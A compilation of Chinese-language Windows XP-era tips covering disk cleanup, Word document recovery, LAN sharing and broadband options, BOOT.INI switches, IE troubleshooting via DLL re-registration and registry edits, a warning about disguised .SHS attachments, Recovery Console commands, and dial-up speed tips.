1.禁用休眠功能。休眠功能是把你的内存里面的所有数据全部存储在硬盘上，然后关机。占用的空间和你的内存大小一致。你可以在控制面板--〉电源选项里面找到是否启用休眠功能。
2.删除不需要的桌面背景。它位于WINDOWS\Web\Wallpaper目录下
3.可以删除一些LOG文件。具体那些能够删除，那些不能够要看你自己的决定了。
4.打开系统信息，然后找到工具菜单下的Dr.Waston（华生医生），打开以后取消除了附加现有日志文件以外的所有复选框。
5.打开系统信息--〉高级标签页，然后点击启动与故障恢复下的设置按钮，在系统失败下的写入调试信息下拉选框中选中无或小内存转储，然后确定推出（图）。

6.修改页面虚拟内存（系统属性--〉高级--〉性能--〉设置--〉高级--〉虚拟内存--〉更改）为自定义！最好不小于256M，不大于382M。而且最大值和最小值最好一样（图）。还不要忘记，修改好以后要点击右边的设置按钮，然后才能够点击确定，否则无效。

OK!减肥篇暂告一个段落，如果大家还有疑问可以来信或留言，我会尽力解答的。


教你Word文档丢失的预防与数据的恢复

《一键清理系统垃圾》

教你Word文档丢失的预防与数据的恢复

    相信当你辛辛苦苦敲了大半天键盘，一篇文章眼看就快完成了，可是就在这时突然停电，或者程序停止了响应，甚至电脑死机，未完成的Word文档还没有保存……人世间最痛苦的事莫过于此。

    为了防止这样痛苦的事情发生，笔者觉得有必要向大家推荐防止Word文件丢失的方法。

    一、使用自动恢复功能：

    Word 2000/XP 能够自动恢复尚未保存的数据。大家只要单击“工具”菜单中的“选项”命令，然后单击“保存”标签，并选中“自动保存时间间隔”复选框，在“分钟”框中，输入时间间隔，以确定Word 2000/XP 保存文档的时间。时间越短，Word 2000/XP 保存文档越频繁，在 Word 2000/XP 中打开文档后出现断电或类似问题时，能够恢复的信息当然也就越多，一般我们设置为1分钟。

    经过上面的设置后，所有在发生断电或类似问题时处于打开状态的文档在下次启动Word时都会显示出来，大家可以对它们进行保存。不过在替换原有文档之前，请验证恢复文件包含有您需要的信息，不要覆盖了原先的文件。

    提示：

    (1)Word 2000/XP/XP的定时保存文件功能仅对DOC文件有效，其他文件无效，所以笔者建议您在编辑的时候先把文档存为Word格式，等编辑完成后再另存为其他格式;

    (2)“自动恢复”功能并不等同于正常的文档保存。如果在 Word 2000/XP 打开恢复文件后选择了不进行保存，则该文件将被删除，未保存的修改也将丢失。如果选择了保存恢复文件，它将会替换原文档(除非给它指定了一个新的文件名)。

    二、让文档自动备份

    如果我们的文档在保存的时候能够再保留一个备份的话，那无疑会使文档保险许多。而在Word 2000/XP中我们完全可以进行设置，让它保存文档的备份：

    单击“工具”菜单中的“选项”命令，接着选择“保存”标签，选中“保留备份”复选框，单击“确定”按钮。经过这样设置后， Word 2000/XP 就会自动保存文档的备份了。

    提示：

    (1)注意Word在编辑文档时会自动地保存其备份，它的扩展名不是“.bak”，而是“.wbk”，如果遇到文档打不开，则只要在打开的范围中选择“所有文件”，直接打开备份文档即可。

    (2)该备份提供了上一次所保存的副本，这样，原文档中会保存有当前所保存的信息，而副本中会保存有上次所保存的信息。每次保存文档时，新的备份都会取代已有的备份。这样就不用担心会不小心保存了不需要的信息或删除了原文件，保留备份可使工作成果免受损失。

    三、恢复受损文档中的文本

    有时候我们在试图打开一个文档时，计算机可能长时间无响应，则表示该文档可能已损坏。这时候同样不需担心，因为下次启动 Word 2000/XP 时，Word 2000/XP 会自动使用专门的文件恢复转换器来恢复损坏文档中的文本。也可随时用此文件转换器打开已损坏的文档并恢复其中的文本。而且操作起来也很简单：

    单击“工具”菜单中的“选项”命令，然后单击“常规”选项卡，并确认选中了“打开时确认转换”复选框，然后单击“确定”按钮。以后单击“打开”按钮 ，单击“文件类型”框中的“从任意文件中恢复文本”选项，成功打开损坏文档，可将它保存为 Word 格式或其他格式(例如，文本格式或 HTML 格式)。段落、页眉、页脚、脚注、尾注和域中的文字将被恢复为普通文字。

    提示：如果在“文件类型”框中没有看到“从任意文件中恢复文本”，则需要安装相应的文件转换器，单击“安装/卸载”选项卡上的“Microsoft Office”选项，并安装“文本恢复工具”即可。


教你技巧：机房共享上网应用全接触

《一键清理系统垃圾》

教你技巧：机房共享上网应用全接触

    本专题旨在为广大共享上网用户提供可选方案和技术上的支持。由于宽带上网的形式和方法多种多样，本专题不可能涵盖所有的技术方案，但相关的方法可作为参考和借鉴。随着共享上网限制措施的不断发展，共享上网仍然会是一个长远的话题，我们有必要了解一下它的原理和基本实现方法。

    共享上网原理与方法概述

    一、局域网共享上网原理

    在局域网共享上网的实现上，无论通过类似路由器这样的硬件设备上网，还是用Windows的Internet连接共享，或者用网关类软件、代理服务器软件等上网，它们的原理都是相同的。

    TCP/IP协议规定了三类局域网保留IP地址，这三个地址段分别是: 10.x.x.x、172.16. x.x、192.168. x.x（x在0～255之间，注意实际用时网络号部分不能为全0或全1）。这些IP地址可以在一个局域网内部使用，但直接以这样的内网地址连接到Internet显然是行不通的。

    为此，当内部的机器与外部的机器连接时，需要先通过有合法外网地址的主机把内网IP地址转换为合法的外网IP地址，这就是网络地址转换（Network Address Translation），简称NAT。

    使用NAT技术可以使一个或数个合法IP地址访问Internet，从而节省了Internet上的合法IP地址；另一方面，通过地址转换，可以隐藏内网上主机的真实IP地址，从而提高网络的安全性。

    比如，连接外网的电脑或设备，通过固定或动态获取得到了一个合法的IP地址，如219.254.38.180，它还需要有一个网络内部的地址比如192.168.0.1，用来充当其他电脑的网关。如果局域网内部的一台电脑IP地址是192.168.0.2：4000（4000是它的端口号），想访问Internet上某个主机，192.168.0.2：4000的请求先传到主机192.168.0.1上，主机把这个IP地址转换为219.254.38.180：9000。然后以端口号为9000的这个IP地址向Internet上的那个主机发出请求，回答的数据流则传回给主机219.254.38.180：9000，主机接收到数据后，会查找与9000这个端口号相关联的内部IP地址，当它发现是192.168.0.2：4000后，就把数据传给192.168.0.2：4000，这样，IP地址的转换就完成了。

    从以上过程可以看出，如果是电脑来充当网关，内网、外网两个地址就需要两块网卡，分别连接内网和外网。但实际上，当这台电脑是通过交换机或路由器连接到外网时，并不一定必须是双网卡，仅仅单网卡也能实现网关。这就需要用到网关类软件的单网卡功能（如SyGate等），它们会虚拟出一块网卡进行内网的连接并充当网关。不过实际的数据流还是从一块网卡上经过的，网卡负荷较大。

    二、共享上网实现方法概述

    1． 从实现途径上区分

    硬件方式：通过路由器、宽带路由器、内置路由功能的ADSL Modem等实现共享上网。使用硬件方式，一般都能实现共享，但设置稍显麻烦。这种方法使用效果好，但投资也稍高。

    软件方式：主要是通过代理服务器类与网关类软件实现。常用的有WinRoute、WinGate、SyGate、CCproxy、UserGate、SpoonProxy、HomeShare、WinProxy、Superproxy、SinforNAT等，还有Windows系统自带的ICS。这些软件中有的还是免费的，虽然方便性不如硬件方式，但能对网络进行有效的管理和控制。

    2． 从服务器工作方式上分

    无服务器方式：就是不需要任何一台电脑充当服务器，是最理想的一种共享上网方法。实际上，无服务器方式并不是真正的无服务器，而是由非电脑的网络设备充当了服务器（比如路由器、带路由功能的ADSL Modem等）。无服务器共享上网方式的实现需要依赖于一定的硬件设备和ISP提供的连接方式，在虚拟拨号的条件下，还需要路由设备中内置有拨号软件。

    单服务器方式：采用一台固定的电脑作为上网服务器（网关）的共享上网方式。一般是在无法实现无服务器共享上网情况下才采用的下策，但也常见于为方便网络管理而使用的情况，比如机房和网吧。这种方式下，服务器必须能经受长时间运行的考验，并借助软件或系统内置功能实现。

    多服务器方式：每台（或多台）电脑都能随时充当服务器的上网方式，是前两者的折中方案。由于多台电脑都要能够随时担当起服务器的角色，所以必须采用单网卡方式的共享上网，并且不方便使用客户端软件，这就要求所用的软件要支持单网卡、可以无客户端。这样一来，符合条件的软件就寥寥无几了，主要有SyGate、HomeShare等少数几个。

    由于各地上网连接方式的不同以及ISP对共享上网的限制，有可能在当地条件下很难找到满意的共享上网方案，这就需要我们从实际的网络环境分析，利用自己所掌握的网络知识，因地制宜地找出解决办法。

    你需要什么样的宽带—宽带接入方式大比拼

    教育信息化热潮一直推动着校园网建设的步伐，在校园网建设中，一个很重要的问题就是选择什么样的宽带接入方式。笔者对最常见的三种宽带网接入方式进行了一些分析和比较：

    一、ADSL（Asymmetric Digital Subscriber Line，非对称数字用户线路）

    优势：ADSL能够在电话网络的铜质双绞线上传送宽带信号，并且又不干扰在同一线路上的通话。ADSL为用户提供1.5Mbps~8Mbps的下行速率和640kbps~1.5Mbps 的上行速率，并且带宽较稳定。每个ADSL用户都有一条单独的线路与ADSL局端相连，它的结构可以看做是星型结构，数据传输带宽是由每一个用户独享的，因而每个用户的带宽是固定的，不会由于用户的增加而导致传输效率的下降。ADSL的用户端到局端是使用点对点传输，在安全性方面比Cable有线接入的HFC网好一些。与其他宽带接入方案相比，ADSL还有一点是它与ISDN、DDN等技术一样以电话网络为基础，以电话双绞线为传输介质，可以充分利用现有的已经铺设好的电话线路，而无需重新布线、构建基础设施，只需在现有铜绞线的两端分别加上一个调制解调器，即可使传输速率增加几十倍，所以改造投入小，比较经济。并且ADSL已经被ANSI及ETSI组织国际标准化，这意味着基于这些标准的ADSL网络产品具有更强的通用性。

    不足之处：ADSL在技术上也有不足之处，它能提供8Mbps带宽，但进一步扩展却很难；ADSL一对铜质双绞线的传送距离可达5公里左右，但实际上因为信号从局端发送到用户端的途中会迅速衰减，受传输距离的制约，其信号质量会降低。由于电话线路的老化或不符合宽带数据传输的标准，还可能会出现一些回传噪声、线路串扰现象，这都会影响到数据传输。

    点评：笔者所在地区只有一些离市话局较近的学校装有ADSL。这种方式投入的成本很低，也比较稳定，只是觉得网速一般。

   二、Cable有线接入

    优势：Cable有线接入技术是建立在高质量双向有线电视网基础上的，以HFC （Hybrid Fiber Coaxial）为主要传输介质，就是光纤同轴电缆的混合网，是一种新型的宽带网络。Cable有线接入可以提供上/下行10Mbps以上的带宽，并且具有抗干扰、数据传输较快的特点，作为宽带网的接入有比较明显的优势。采用光纤和电缆作为传输介质，具有丰富的频带资源，而且不存在由于电话线质量和串扰引起的问题。随着新标准的推行，Cable Modem的价格与普通调制解调器接近，使接入成本降低，对用户十分有利。另外，我国的有线电视经过了十几年的发展，已经相当普及，利用有线电视网络资源实现宽带接入有很大优势，很多比较偏远的学校也可以接入。基于HFC结构，利用Cable Modem实现数据接入服务，还能提供交互式数字电视服务以及多媒体信息服务。

    不足之处：Cable有线接入技术的网络拓扑结构相对比较落后，信道带宽是整体用户所共享的，一旦用户数增多，每个用户所分配的带宽就会急剧下降；另外，因为传输广播电视信号要占用部分的通信频带，剩余的频带资源无法满足宽带网高速数据传输的要求。

    点评：Cable有线接入是目前笔者所在地区使用最广泛的宽带接入方式，总的感觉是网速不稳定，有时快有时慢，可能是用户数量变化引起的。

    三、以太网接入

    优势：以太网接入是一种局域网技术，其带宽可达到G位以太网或更高速。以太网的帧格式与IP是一致的，特别适合传输IP数据。一般可以采用FTTB宽带接入，千兆或百兆到校，每个节点的接入速率可达10Mbps，如果需要也可以扩充到100Mbps。使用FTTB网不需要拨号，用户只要开机就可接入Internet。

    以太网具有优良的可扩展性，升级扩容非常方便；用户享有的带宽稳定，不存在ADSL最高传输速率受到传输距离制约的问题，也不存在Cable有线接入随着用户的增加，每个用户分得的可用带宽会大大下降的缺点。

    不足之处：前期投入较大，必须进行重新布线，铺设线路有一定难度；IP地址资源要求数量过大，管理水平要求较高等。

    点评：这种方式主要应用于一些规模较大的学校，网速很快，也比较稳定。但由于前期成本过高，目前不适合规模较小的中小学校使用。


解读引导文件BOOT.INI

《一键清理系统垃圾》

解读引导文件BOOT.INI

Windows NT类的*作系统，也就是Windows NT/2000/XP中，有一个特殊文件，也就是“BOOT.INI”文件，这个文件会很轻松地按照我们的需求设置好多重启动系统。
“BOOT.INI”文件会在已经安装了Windows NT/2000/XP的*作系统的所在分区，一般默认为C:\下面存在。但是它默认具有隐藏和系统属性，所以你要设置你的文件夹选项，以便把“BOOT.INI”文件显示出来。我们可以用任何一种文本编辑器来打开他它。一般情况下，它的内容如下:
[boot loader]
timeout=30
default=multi(0)disk(0)rdisk(0)partition(1)\Windows
[operating systems]
multi(0)disk(0)rdisk(0)partition(1)\Windows="Microsoft Windows XP Professional" /fastdetect
    在Windows 2000或者是XP系统中，我们可以很容易的设置“BOOT.INI”文件。那就是在“我的电脑”上面点击右键，选择“属性”打开“系统属性”对话框，再点击“高级”选项卡，在“启动和故障修复”里面点击“设置”按钮，就可以打开“启动和故障修复”对话框了，在这里面我们就可以对它进行详细设置。
    如果你拥有Windows XP*作系统，那么你可以用“系统配置实用程序”来更方便的编辑“BOOT.INI”文件。具体做法是:打开“开始”菜单，点击“运行”命令，再在弹出的文本框中输入“msconfig”点击“确定”后就会弹出“系统配置实用程序”，再点击“BOOT.INI”选项卡。
在这里，我们可以很方便地设置文件。言归正传，现在，来说明一下这个文件内容的含义。
    1.系统加载部分（[boot loader]）
    这一部分很简单，只有两个设定。那就是“timeout=”和“default=”。“timeout=”就是设定开机时系统引导菜单显示的时间，超过设定值则自动加载下面“default=”指定的*作系统。默认值是30，单位为秒。我们可以在这里面设定等待时间的长短。如果将其设为“0”那么就是
不显示系统引导菜单。“default=”则是设定默认引导的*作系统。而等号后面的*作系统必须是已经在“[operating systems]”中存在的。如果想默认为加载另外的*作系统，我们可以参看“[operating systems]”中的操作系统列表，然后把想要加载的*作系统按照格式写到“default=”后面就可以了。
    2.操作系统部分（[operating systems]）
    在这里面，列出了机器上所安装的全部*作系统。比如机器上只有一个*作系统，那么就只有一条信息，那就是“multi(0)disk(0)rdisk(0)partition(1)\Windows="Microsoft Windows XP Professional" /fastdetect”在这里需要注意的是，在英文引号内的文字就是引导*作系统菜单时显示出来的让我们选择*作系统的提示文字，在这里面我们可以随意更改。而“multi(0)disk(0)rdisk(0)partition(1) \Windows”这一句
就需要些解释了。因为它涉及ARC（高级RISC计算机）命名，它是x86或RISC计算机中用于标识设备的动态方法。ARC命名的第一部分用于标识硬件适配卡/磁盘控制器，它有两个选项:SCSI和Multi。Multi表示一个非SCSI硬盘或一个由SCSI BIOS访问的SCSI硬盘，而SCSI则表示一个SCSI BIOS禁止的SCSI硬盘。(x)是硬件适配卡序号。Disk(x)表示SCSI总线号。如果硬件适配卡为Multi，其正确表示方法就为disk(0)，rdisk(x)则表示硬盘的序号，如果硬件适配卡为SCSI则忽略此值;
    partition(x)表示硬盘的分区序号。了解这些，我们就可以解释前面那条信息的含义了，即“multi(0)disk(0)rdisk(0)partition(1) \Windows”为，在0号非SCSI设备上的第0号磁盘上的第一个分区里面的“Windows”目录下可以找到能够启动的*作系统。
    等号后的内容前面已经说过，那个就是引导菜单显示出来的供我们选择的提示文字。而后面的 “/fastdetect”又是作什么用的呢？这是一个开关符，用来控制启动该*作系统时的具体选项，下面再来详细的介绍各种开关符的含义:/3GB:这是Win2000 SP3新引入的。这使得用户区和系统区分为3G比1G的比例。只有用户使用NT企业版，应用程序也支持3GB选项时，此选项才生效。
    /BASEVIDE使用标准VGA方式启动。这种方式主要用于显示驱动程序失效时。
    /BAUDRATE:指出用于调度的波特率，如果用户不设置，则使用默认的9600，而对于线缆Modem则使用19200。
   /BOOTLOG:使Win2000将日志写入 %SystemRoot%\NTBTLOG.TXT 。
  /BURNMEMORY=:使NT在已知的内存上少使用指定的数量，如果/burnmemory=64，则有64M内存NT不使用。
    /CRASHDEBUG:调度器在NT启动时启动，只有在内核错误时才有用，如果系统经常会无故出错，这个选项就很有用了。
    /DEBUG:在启动NT时调入调度器，它可以在任何时间激活，在错误可以再次出现时使用它比较合适。
    /DEBUGPORT= comx :指定用于调度的端口，其它X就指端口号。
    /FASTDETECT:对于Win2000启动时，它使系统不检查串行口和并行口。
    /HAL=<hal>:允许用户不使用默认的HAL。
    /INTAFFINITY:设置多处理器HAL(HALMPS.DLL)，使编号最大的处理器接收中断请求。如果不设置此选项，Win2000会使所有处理器接收中断请求。
    /KERNEL=<kernel>:与上面的功能相同，不过是针对SMP中的内核而言的。
    /MAXMn:指定NT可以使用的最大内存数，如果一个内存片损坏，这个开关就十分有用了。
    /NODEBUG:不使用调试信息。
/NOGUIBOOT:指定此选项会使Win2000不加载VGA驱动程序，也就不会显示启动过程和失败时的兰屏信息。
    /NOSERIALMICE=[COMx | COMx,y,z…]:在特定的COM中上禁止对串行鼠标的检测。如果用户有一个非鼠标设备接在COM口上，这个选项会十分有用。如果此开关未加参数，系统会禁止所有COM口。
    /NUMPROC=n:只允许前N个系统处理器工作。
    /ONECPU:在多处理器中只使用一个处理器。
    /PCILOCK:不让NT为PCI设置分配IO/IRQ资源，而启用BIOS设置。
    /SAFEBOOT:安全启动，这个大家一定十分熟悉，Win2000只启动HKLM\System\CurrentControlSetControl\SafeBoot中的驱动程序和服务，其后跟三个参数MINIMAL，NETWORK或DSREPAIR之一。MINIMAL和NETWORK在允许网络下启动系统。而DSREPAIR要求系统从备份设备中调入活动目录的设置。还有一个选项是"(ALTERNATESHELL)"，它让系统调入由HKLM\System\CurrentControlSetSafeBoot\AlternateShell指定的SHELL程序，而不使用默认的Explorer。
    /SOS:在调入驱动程序名时显示它的名字，在因驱动问题而无法启动时使用比较好。
    /WIN95:在装有三个系统DOS、Win9x和Windows NT的系统上，让NTLDR直接调用Win9x。启动文件BOOTSECT.W40。
    /WIN95DOS:在装有三个系统DOS、Win9x和Windows NT的系统上，让NTLDR直接调用DOS启动文件BOOTSECT.DOS
    /YEAR=:使用指定的年份，如果设置为/YEAR=2005，那现在的时间就是2005年，此选项仅对NT4+SP4和Win2000生效。
了解了以上这些，我们就可以更加轻松控制好我们系统的启动了。


IE无法打开二级链接

《一键清理系统垃圾》

IE无法打开二级链接

IE新建窗口模块被破坏所致，需要重新注册几个动态链接文件。

点击：开始---运行---重新注册（输入）以下DLL文件。（一个一个依次注册）
regsvr32 Actxprxy.dll
regsvr32 Shdocvw.dll

重启系统，不行再添加以下的DLL文件。

regsvr32 Mshtml.dll
regsvr32 Urlmon.dll
regsvr32 Msjava.dll
regsvr32 Browseui.dll
regsvr32 Oleaut32.dll
regsvr32 Shell32.dll

另：msjava.dll是JAVA虚拟机的动态连接库，提示找不到模板是因为你的机子没装虚拟机,所以这个文件，你可以不必注册的。


IE浏览器常见经典故障

《一键清理系统垃圾》

IE浏览器常见经典故障

    当你驾着心爱的IE在Internet上纵横驰骋时，突然桌面上弹出一个莫名其妙的警告提示框，紧接着所有IE窗口全部关闭；或无论如何点击链接，IE始终没有反应……这些故障让人心烦意乱，无可奈何。不过你也不用手足无措，今天我们就一起将IE常见错误揪出来，并彻底消灭！

    1.发送错误报告

    【故障现象】在使用IE浏览网页的过程中，出现“Microsoft Internet Explorer遇到问题需要关闭……”的信息提示。此时，如果单击“发送错误报告”按钮，则会创建错误报告，单击“关闭”按钮之后会引起当前IE窗口关闭；如果单击“不发送”按钮，则会关闭所有IE窗口。

    【故障点评】这是IE为了解用户在使用中的错误而设计的一个小程序，不过我可不想当微软的“免费测试员”，更何况每天它都会面对成千上万的报告，谁知道有没有在意我的报告问题呢？！

    【故障解决】

    针对不同情况，可分别用以下方法关闭IE发送错误报告功能:

    ①对IE 5.x用户，执行“控制面板→添加或删除程序”，在列表中选择“Internet Explorer Error Reporting”选项，然后单击“更改/删除”按钮，将其从系统中删除。

    ②对Windows 9x/Me/NT/2000下的IE 6.0用户，则可打开“注册表编辑器”，找到[HKEY_LOCAL_MACHINE＼Software ＼Microsoft＼Internet Explorer＼Main]，在右侧窗格创建名为IEWatsonEnabled的DWORD双字节值，并将其赋值为0。

    ③对Windows XP的IE 6.0用户，执行“控制面板→系统”，切换到“高级”选项卡，单击“错误报告”按钮，选中“禁用错误报告”选项，并选中“但在发生严重错误时通知我”，最后单击“确定”按钮。

    2.IE发生内部错误，窗口被关闭

    【故障现象】在使用IE浏览一些网页时，出现错误提示对话框:“该程序执行了非法操作，即将关闭……”，单击“确定”按钮后又弹出一个对话框，提示“发生内部错误……”。单击“确定”按钮后，所有打开的IE窗口都被关闭。

    【故障点评】该错误产生原因多种多样，内存资源占用过多、IE安全级别设置与浏览的网站不匹配、与其他软件发生冲突、浏览网站本身含有错误代码……这些情况都有可能，需要耐心加以解决。

    【故障解决】

    ①关闭过多的IE窗口。如果在运行需占大量内存的程序，建议IE窗口打开数不要超过5个。

    ②降低IE安全级别。执行“工具→Internet选项”菜单，选择“安全”选项卡，单击“默认级别”按钮，拖动滑块降低默认的安全级别。

    ③将IE升级到最新版本。IE 6.0下载地址:http://download.sina.com.cn/cgi-bin/detail.cgi?s_id=6041。IE 6.0 SP1下载地址:download.microsoft.com。

    可使用以IE为核心的浏览器，如MyIE2。它占用系统资源相对要少，而且当浏览器发生故障关闭时，下次启动它，会有“是否打开上次发生错误时的页面”的提示，尽可能地帮你挽回损失。下载地址:http://download.sina.com.cn/cgi-bin/detail.cgi?s_id=8012。

    3.出现运行错误

    【故障现象】用IE浏览网页时弹出“出现运行错误，是否纠正错误”对话框，单击“否”按钮后，可以继续上网浏览。

    【故障点评】可能是所浏览网站本身的问题，也可能是由于IE对某些脚本不支持。

    【故障解决】

    ①启动IE，执行“工具→Internet选项”菜单，选择“高级”选项卡，选中“禁止脚本调试”复选框，最后单击“确定”按钮即可。

    ②将IE浏览器升级到最新版本。

    4.IE窗口始终最小化的问题

    【故障现象】每次打开的新窗口都是最小化窗口，即便单击“最大化”按钮后，下次启动IE后新窗口仍旧是最小化的。

    【故障点评】IE具有“自动记忆功能”，它能保存上一次关闭窗口后的状态参数，IE本身没有提供相关设置选项，不过可以借助修改注册表来实现。

    【故障解决】

    ①打开“注册表编辑器”，找到[HKEY_ CURRENT_USER＼Software＼Microsoft＼Internet Explorer＼Desktop＼Old WorkAreas]，然后选中窗口右侧的“OldWorkAreaRects”，将其删除。

    ②同样在“注册表编辑器”中找到[HKEY_CURRENT_USER＼Software ＼Microsoft＼Internet Explorer＼Main]，选择窗口右侧的“Window_Placement”，将其删除。

    ③退出“注册表编辑器”，重启电脑，然后打开IE，将其窗口最大化，并单击“往下还原”按钮将窗口还原，接着再次单击“最大化”按钮，最后关闭IE窗口。以后重新打开IE时，窗口就正常了！

    5.IE无法打开新窗口

    【故障现象】在浏览网页过程中，单击超级链接无任何反应。

    【故障点评】多半是因为IE新建窗口模块被破坏所致。

    【故障解决】单击“开始→运行”，依次运行“regsvr32 actxprxy.dll”和“regsvr32 shdocvw.dll”将这两个DLL文件注册，然后重启系统。如果还不行，则可以将mshtml.dll、urlmon.dll、msjava.dll、browseui.dll、oleaut32.dll、shell32.dll也注册一下。

    6.脱机却无法浏览本机上的网页

    【故障现象】通过IE的“脱机浏览”功能，我们差不多能浏览所有已经下载到本地硬盘的网页内容，这对拨号上网的用户来说更是省钱的一大法宝。但有时，目标网页虽然在硬盘上，但是却提示“无法浏览”。

    【故障点评】这多半是由于你修改了系统时间，引起了IE历史记录的错乱。

    【故障解决】

    ①可用直接在“临时文件夹”中搜索的方法来激活它。按下Win+F，在“包含文字”处输入部分记忆中的关键字，在“搜索”处按“浏览”按钮选择IE临时文件夹的地址，如“C:＼WINDOWS＼Temporary Internet Files”，单击“开始查找”，在结果列表里双击目标页打开。

    ②可以尝试用腾讯的TE等浏览器来脱机浏览。

    7.联网状态下，浏览器无法打开某些站点

    【故障现象】上网后，在浏览某些站点时遇到各种不同的连接错误。

    【故障点评】这种错误一般是由于网站发生故障或者你没有浏览权限所引起。

    【故障解决】针对不同的连接错误，IE会给出不同的错误信息提示，比较常见的有以下几个:

    ①提示信息:404 NOT FOUND这是最为常见的IE错误信息。主要是因为IE不能找到你所要求的网页文件，该文件可能根本不存在或者已经被转移到了其他地方。

    ②提示信息:403 FORBIDDEN常见于需要注册的网站。一般情况下，可以通过在网上即时注册来解决该问题，但有一些完全“封闭”的网站还是不能访问的。

    ③提示信息:500 SERVER ERROR通常由于所访问的网页程序设计错误或者数据库错误而引起，你只有等待对方网页纠正错误后再浏览了:-(。

    小渔收集了一个IE错误代码大全，大家在遇到IE错误提示信息，但是搞不清楚的时候，可以去这里查阅:http://www.cfan.com.cn/09net/19ie.htm。

    8.IE无法重新安装

    【故障现象】IE不能正常使用，在重装时却提示“发现系统中有该版本的IE”而拒绝安装；“添加或删除程序”中又没有卸载选项。

    【故障点评】“重装”是解决IE故障的“终极大法”，也是初级用户的法宝。

    【故障解决】

    ①对IE 5.0的重装可按以下步骤进行:

    第一步:打开“注册表编辑器”，找到[HKEY_LOCAL_ MACHINE＼Software＼Microsoft＼Internet Explorer]，单击其下的Version Vector键。

    第二步:在右侧窗格中双击IE子键，将原来的“5.0002”改为“4.0”，单击“确定”后退出“注册表编辑器”。

    第三步:重启后，就可以重装IE 5.0了。

    ②IE 6.0的重装有两种方法:

    方法1:打开“注册表编辑器”，找到[HKEY_LOCAL_ MACHINE＼SOFTWARE＼Microsoft＼Active Setup＼Installed Components＼{89820200-ECBD-11cf-8B85-00AA005B4383}]，将IsInstalled的DWORD值改为0就可以了。

    方法2:放入Windows XP安装盘，在“开始→运行”窗口键入“rundll32.exe setupapi,InstallHinfSection DefaultInstall 132 %windir%＼Inf＼ie.inf”。


解释Windows 碎片对象（.SHS）

《一键清理系统垃圾》

解释Windows 碎片对象（.SHS）

    你可能知道很多类型的文件，它们都有着各自不同的后缀名，从它们的后缀名你可以很轻松的识别出来它们的类型，可是你又是否知道有一些这样的文件，它们的后缀名在Windows下是永远不可见的（你用DOS和Linux当然除外），而且更可怕的是有时候还可以利用这种特性对你进行恶意的攻击，还是来看一看吧，能够防患于未然当然是最好不过的了……
    在Windows 95/98/NT中有一些文件的扩展名是一般用户从来都没有听说过的甚至可能是永远不会遇到的。Windows操作系统的设计者对这些文件扩展名在Windows资源管理器中不可见有着相当的自信，即使你选择了显示所有文件和所有文件扩展名选项也一样不能看到，Windows碎片对象(.SHS)就属于该隐蔽的类别。
    依照微软的解释，SHS文件是一类特殊的OLE（Object Linking and Embedding，对象连接和嵌入）对象，可以由Word文档或Excel电子表格创建。通过选择文档中文本或图像的一块区域，然后拖放该区域到桌面上的某处，就可以创建一个Windows碎片对象，或称为SHS文件（此文件是不可读文件）。但是你可以用任何其它你想要的文件名重新命名SHS文件，或者拖放SHS对象到另一个文档（同样地，你可以剪切和粘贴）。

   制作你自己的.SHS
    制作一个Windows碎片对象是如此的容易，不是吗？实际就是这么容易的。按此步骤简单操作：
   最小化Microsoft Word，显示出桌面。
   在打开的Word文档中选择几行文本或一幅图像。
    拖拽选中的文本或图像到桌面。一个碎片文件就创建好了，现在你可以拖移.SHS文件到其它的文档或程序了。

    SHS文件的好处
    假如你想要剪切和粘贴多个对象到多个文档。Windows的剪贴板特色是只保留最后复制的一条内容，所以你的任务就变得冗长乏味了。但是，利用Windows碎片对象，你可以改为创建一些只包含几行文本或图像的桌面对象以用于以后移动到其它文档中。当你准备好粘贴，只须简单地点击碎片对象，从桌面拖放到一个打开的文档中。你做好以后，SHS对象本身就可以放到回收站删除了。
    说完这些，重要的是记住：Windows碎片对象首先是一个空壳。例如，一个Word的Windows SHS文件可能只包含默认的页边设置。但是，当.SHS文件作为电子邮件的附件发送时，它可能也包含能够删除你所有计算机的文件的恶意的代码。

    警惕陌生人带来的礼物
    防病毒专家对这些隐蔽的扩展名是很注意的。目前的伎俩就是发送可识别开头的病毒附件，然后附加一些诸如.SHS的扩展名。举例说，一个用户收到了一个名为FAMILY_PHOTO.JPG.SHS的文件，很可能只“看到” FAMILY_PHOTO.JPG。用户因为知道一个.JPG文件通常是图片照片而打开它（这就是危险的根源）。阅读整个的文件名且警惕任何额外的文件扩展名如.VBS或.SHS是相当重要的。当这些附件第一次到达的时候就删除它们也是个很好的主意，特别是未知资源的附件。


Win XP控制台命令详解

《一键清理系统垃圾》

Win XP控制台命令详解

    Win XP（包括2000）的控制台命令是在系统出现一些意外情况下的一种非常有效的诊断和测试以及恢复系统功能的工具。小编的确一直都想把这方面的命令做个总结，这次辛苦老范给我们整理了这份实用的秘笈。

第一部分：文件和目录操作命令

    Attrib　　　Batch　　　　　Chdir (Cd)

    Copy　　　　Delete (Del)　　Expand

    Mkdir (md)　Rmdir (Rd)　　　Type

    More

第二部分：系统和磁盘操作命令

    Bootcfg　　　hkdsk　　　Diskpart

    Fixboot　　　Fixmbr　　　Format

    Map

第三部分：辅助操作和特殊功能命令

    Cls　　　　　Disable　　　Enable

    Exit　　　　Help　　　　　commandname

    Listsvc　　　Logon　　　　Net use

    Set　　　　　Systemroot


快速拨号上网有技巧

《一键清理系统垃圾》

快速拨号上网有技巧

    信息瞬息万变的今天，学习和使用因特网已经成为社会的时尚，越来越多的人开始加入了这个行列。而目前绝大多数中国网民都是通过电话拨号的方式接入因特网的，所以我们在拨号过程中遇到这样或那样的问题是在所难免的，例如拨号时经常断线，拨号时调制解调器没有声音或者拨号过程中等待的时间很长等等。为了解决上面出现的问题，不少“大侠”们可以说没有少动脑筋，他们潜心“修炼”得来的加速秘籍确实给众位初学者带来了精神和物质上的收效。同样在这里，为了能使我们初学者提高上网登录速度，笔者也把自己在平时阅读的或者实践中用到的有关拨号网络的小技巧罗列下来，也算是为初级拨号用户作点小贡献吧。
1.删除掉不使用的协议
如果你使用单个计算机来上网的话，一般只需要一个TCP/IP协议就可以了。所以我们完全可以把除TCP/IP协议之外的所有协议都删除掉，这样不但能提高机器启动的速度还可以提高拨号的成功率。具体操作方法是打开拨号网络参数设置对话框，然后选中除TCP/IP协议之外的协议再单击“删除”就可以了。但不要误删拨号网络适配器。
2.删除无用的虚拟专用网络VPN
